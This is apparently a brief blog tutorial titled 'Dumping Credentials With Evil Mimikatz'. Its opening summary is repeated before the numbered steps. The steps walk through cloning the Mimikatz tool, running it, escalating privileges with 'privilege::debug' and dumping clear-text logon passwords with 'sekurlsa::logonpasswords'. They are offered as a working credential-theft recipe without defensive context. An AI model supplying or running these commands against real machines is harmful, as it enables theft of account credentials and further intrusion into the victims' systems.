Dumping Credentials With Evil Mimikatz
Mimikatz is a post exploitation tools used for clear text dumping credentials and many else Dumping credentials with mimiktatz 1.first this first clone the script with git clone https://github.com/ParrotSec/mimikatz 2.run mimikatz.exe in X64 directory…
Mimikatz is a post exploitation tools used for clear text dumping credentials and many else
Dumping credentials with mimiktatz
1.first this first clone the script with git clone https://github.com/ParrotSec/mimikatz
2.run mimikatz.exe in X64 directory
3.Escalate privilege with privilege::debug

4.then dumping credentials with the follow command sekurlsa::logonpasswords




